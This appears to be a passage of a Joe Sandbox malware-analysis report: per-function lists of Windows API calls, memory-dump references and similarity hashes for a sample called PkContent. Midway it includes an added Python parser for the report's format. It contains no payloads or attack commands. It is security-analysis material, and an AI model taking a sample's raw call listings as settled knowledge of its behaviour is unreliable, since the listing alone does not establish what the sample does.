                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                APIs
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Char$Next$CreateDirectoryPrev
                                                • String ID:
                                                • API String ID: 4115351271-0
                                                • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                APIs
                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $ @$M$N
                                                • API String ID: 1638840714-3479655940
                                                • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
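The per-function records above (an "APIs" list, optional "Strings", then the "Memory Dump Source" block) are regular enough to parse, which is useful when triaging a long report like this one: pull every call site out of the text export, separate calls the plugin attributes to a subcallee ("Part of subcall function <addr>") from direct calls, and decode which memory region each function was lifted from. The parser below is an added example written for this page, not Joe Sandbox code. Its sample input is a few lines copied from this section (one argument list shortened). Two things are assumptions rather than documented facts: that the fourth dot-separated field of a `.sdmp` name is the region address and the fifth its Windows `PAGE_*` protection value (consistent with `0x20` on the code page at `0x401000` and `0x04` on the data pages listed here), and that argument lists can be split on commas, which is naive for string arguments containing commas.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: lines copied from this report section (one argument list
# shortened) so the parser can be exercised offline.
SAMPLE = """\
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
Memory Dump Source
• Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8), ref: 0040609B
  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8), ref: 004060C3
• CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
Memory Dump Source
• Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
DUMP_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

# Windows PAGE_* memory protection constants (values from the Win32 headers).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                 # call-site address reported after "ref:"
    caller: Optional[int]    # set when the line says "Part of subcall function <addr>"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    dump: Optional[Dict[str, object]] = None


def parse_dump_name(name: str, offset: str) -> Dict[str, object]:
    """Decode a .sdmp file name. ASSUMPTION (not stated on the page): field 4 is
    the region address and field 5 the PAGE_* protection of that region."""
    fields = name.split(".")
    protect = int(fields[4], 16)
    return {"region": int(fields[3], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "image_base": int(offset, 16)}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the listing into per-function records; a record starts at an 'APIs'
    header and is closed by its 'Source File:' line."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = API_RE.match(line)
        if m and current is not None:
            current.calls.append(ApiCall(
                api=m["api"], module=m["module"],
                args=[a.strip() for a in m["args"].split(",")],  # naive split (assumption)
                ref=int(m["ref"], 16),
                caller=int(m["caller"], 16) if m["caller"] else None))
            continue
        m = DUMP_RE.search(line)
        if m and current is not None:
            current.dump = parse_dump_name(m["name"], m["offset"])
            current.dump["based_on_pe"] = m["pe"] == "true"
            current = None  # record complete; skip the Associated/Similarity lines
    return records


def direct_api_counts(records: List[FunctionRecord]) -> Counter:
    """Count (api, module) pairs each function calls directly, excluding calls
    the plugin attributes to a subcallee."""
    return Counter((c.api, c.module) for r in records for c in r.calls if c.caller is None)


def calls_in_region(records: List[FunctionRecord], lo: int, hi: int) -> List[ApiCall]:
    """Return every call whose call-site address lies in [lo, hi)."""
    return [c for r in records for c in r.calls if lo <= c.ref < hi]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for (api, module), n in direct_api_counts(recs).most_common():
        print(f"{api}.{module}: {n}")
    for r in recs:
        print(r.dump)
```

Run it over the full text export of the report to get a direct-call inventory per function and a quick view of which call sites fall inside a given range (for example, everything lifted from the `0x401000` code region, which the dump name marks as `PAGE_EXECUTE_READ`).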
                                                APIs
                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
